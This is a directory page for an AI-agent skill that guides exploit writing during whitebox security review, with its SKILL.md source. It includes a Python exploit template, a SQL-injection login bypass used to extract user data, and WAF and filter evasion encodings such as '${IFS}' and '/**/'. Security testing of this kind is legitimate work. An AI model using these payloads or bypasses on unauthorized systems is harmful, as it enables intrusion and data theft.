Exploit Techniques

This skill should be used when the user asks to "write an exploit", "create PoC", "develop proof of concept", "exploit script", "automate exploitation", "build exploit", or needs guidance on developing working exploits during whitebox security review.

14 stars

Best use case

Exploit Techniques is best used when you need a repeatable AI agent workflow instead of a one-off prompt.

This skill should be used when the user asks to "write an exploit", "create PoC", "develop proof of concept", "exploit script", "automate exploitation", "build exploit", or needs guidance on developing working exploits during whitebox security review.

Teams using Exploit Techniques should expect a more consistent output, faster repeated execution, less prompt rewriting.

When to use this skill

  • You want a reusable workflow that can be run more than once with consistent structure.

When not to use this skill

  • You only need a quick one-off answer and do not need a reusable workflow.
  • You cannot install or maintain the underlying files, dependencies, or repository context.

Installation

Claude Code / Cursor / Codex

$curl -o ~/.claude/skills/exploit-techniques/SKILL.md --create-dirs "https://raw.githubusercontent.com/allsmog/vuln-scout/main/vuln-scout/skills/exploit-techniques/SKILL.md"

Manual Installation

  1. Download SKILL.md from GitHub
  2. Place it in .claude/skills/exploit-techniques/SKILL.md inside your project
  3. Restart your AI agent — it will auto-discover the skill

How Exploit Techniques Compares

Feature / AgentExploit TechniquesStandard Approach
Platform SupportNot specifiedLimited / Varies
Context Awareness High Baseline
Installation ComplexityUnknownN/A

Frequently Asked Questions

What does this skill do?

This skill should be used when the user asks to "write an exploit", "create PoC", "develop proof of concept", "exploit script", "automate exploitation", "build exploit", or needs guidance on developing working exploits during whitebox security review.

Where can I find the source code?

You can find the source code on GitHub using the link provided at the top of the page.

SKILL.md Source

# Exploit Development Techniques

## Purpose

Guide the development of Proof of Concept (PoC) exploits to demonstrate confirmed vulnerabilities. This is Phase 3 of the whitebox security review process.

## When to Use

Activate this skill when:
- A vulnerability has been confirmed through local testing
- Writing automated exploit scripts
- Documenting exploitation steps
- Bypassing security controls

## Language Selection

Choose exploit language based on target:

| Scenario | Recommended Language |
|----------|---------------------|
| Web application (server-side) | Python |
| Client-side attack (browser) | JavaScript |
| Mixed (client + server chain) | Python + JavaScript |
| Binary exploitation | Python (pwntools) |
| Windows target | Python or PowerShell |
| Linux target | Python or Bash |
| Reusing application logic | Same as application |

## Python Exploit Structure

### Basic Template

```python
#!/usr/bin/env python3
"""
Exploit: [Application Name] [Vulnerability Type]
Author: [Your Name]
Date: [Date]
CVE: [If applicable]

Description:
[Brief description of the vulnerability]

Usage:
python3 exploit.py <target_url>
"""

import requests
import sys
import argparse

class Exploit:
    def __init__(self, target):
        self.target = target.rstrip('/')
        self.session = requests.Session()
    
    def check_vulnerable(self):
        """Verify target is vulnerable"""
        # Implementation
        pass
    
    def exploit(self):
        """Execute the exploit"""
        # Implementation
        pass
    
    def cleanup(self):
        """Remove any artifacts"""
        # Implementation
        pass

def main():
    parser = argparse.ArgumentParser(description='Exploit description')
    parser.add_argument('target', help='Target URL')
    parser.add_argument('--check', action='store_true', help='Check only')
    args = parser.parse_args()
    
    exploit = Exploit(args.target)
    
    if args.check:
        if exploit.check_vulnerable():
            print("[+] Target is vulnerable")
        else:
            print("[-] Target is not vulnerable")
        return
    
    try:
        exploit.exploit()
    finally:
        exploit.cleanup()

if __name__ == '__main__':
    main()
```

### HTTP Requests Pattern

```python
import requests

# Basic GET
response = requests.get(f"{target}/path", params={"key": "value"})

# POST with data
response = requests.post(f"{target}/path", data={"key": "value"})

# POST with JSON
response = requests.post(f"{target}/path", json={"key": "value"})

# With headers
headers = {"Authorization": "Bearer token", "X-Custom": "value"}
response = requests.get(f"{target}/path", headers=headers)

# With cookies
cookies = {"session": "abc123"}
response = requests.get(f"{target}/path", cookies=cookies)

# Session persistence
session = requests.Session()
session.post(f"{target}/login", data={"user": "admin", "pass": "pass"})
session.get(f"{target}/admin")  # Session cookies maintained
```

## Exploit Development Workflow

### Step 1: Document Manual Steps

Before automating, document each manual step:

```
1. Send request to /login with username=admin' OR 1=1--
2. Extract session token from response cookie
3. Access /admin/users with session token
4. Extract user data from response
```

### Step 2: Implement Core Exploit

Translate manual steps to code:

```python
def exploit(self):
    # Step 1: SQL Injection for auth bypass
    login_data = {"username": "admin' OR 1=1--", "password": "x"}
    resp = self.session.post(f"{self.target}/login", data=login_data)
    
    if "Welcome" not in resp.text:
        print("[-] Authentication bypass failed")
        return False
    
    # Step 2: Access admin panel
    resp = self.session.get(f"{self.target}/admin/users")
    
    # Step 3: Extract data
    users = self.parse_users(resp.text)
    return users
```

### Step 3: Add Error Handling

```python
def exploit(self):
    try:
        resp = self.session.post(f"{self.target}/login", data=payload, timeout=10)
        resp.raise_for_status()
    except requests.exceptions.Timeout:
        print("[-] Request timed out")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
```

### Step 4: Add Verification

```python
def check_vulnerable(self):
    """Non-destructive vulnerability check"""
    test_payload = "admin' AND '1'='1"
    resp = self.session.post(f"{self.target}/login", 
                              data={"username": test_payload, "password": "x"})
    
    # Check for SQL error or successful bypass
    indicators = ["SQL syntax", "mysql_fetch", "Welcome admin"]
    return any(ind in resp.text for ind in indicators)
```

### Step 5: Add Cleanup

```python
def cleanup(self):
    """Remove artifacts created during exploitation"""
    # Delete uploaded files
    # Restore modified data
    # Remove created accounts
    pass
```

## Bypass Techniques

### WAF Bypass in Payloads

```python
# URL encoding
payload = urllib.parse.quote(payload)

# Double URL encoding
payload = urllib.parse.quote(urllib.parse.quote(payload))

# Unicode encoding
payload = payload.encode('unicode_escape').decode()

# Case variation
payload = ''.join(c.upper() if i % 2 else c.lower() for i, c in enumerate(payload))
```

### Filter Bypass

```python
# Space alternatives
payload = payload.replace(' ', '/**/') # SQL
payload = payload.replace(' ', '${IFS}') # Command injection

# Quote alternatives
payload = payload.replace("'", "\\x27")
payload = payload.replace('"', '\\x22')
```

## Output and Reporting

### Success Indicators

```python
def print_success(self, message):
    print(f"\033[92m[+]\033[0m {message}")

def print_error(self, message):
    print(f"\033[91m[-]\033[0m {message}")

def print_info(self, message):
    print(f"\033[94m[*]\033[0m {message}")
```

### Structured Output

```python
def generate_report(self):
    return {
        "target": self.target,
        "vulnerability": "SQL Injection",
        "endpoint": "/login",
        "parameter": "username",
        "payload": self.payload,
        "impact": "Authentication Bypass",
        "exploited": True,
        "data_extracted": self.extracted_data
    }
```

## Security Considerations

### Safe Testing

1. Always test on authorized targets only
2. Use non-destructive payloads when possible
3. Implement cleanup routines
4. Avoid DoS conditions
5. Log all actions for accountability

### Responsible Disclosure

1. Document findings clearly
2. Provide remediation guidance
3. Allow reasonable fix timeline
4. Coordinate disclosure with vendor

## Additional Resources

### Example Files

Working exploit templates in `examples/`:
- **`sqli-template.py`** - SQL injection exploit with union/blind detection
- **`cmdi-template.py`** - Command injection with OS detection and reverse shell
- **`deser-template.py`** - Deserialization exploits (Python, PHP, Java formats)

### Integration with Other Skills

- Use **dangerous-functions** to identify initial targets
- Use **data-flow-tracing** to confirm vulnerability
- Use **vuln-patterns** for technique selection

Related Skills

We are still matching the closest adjacent skills for this page. In the meantime, continue through the full directory.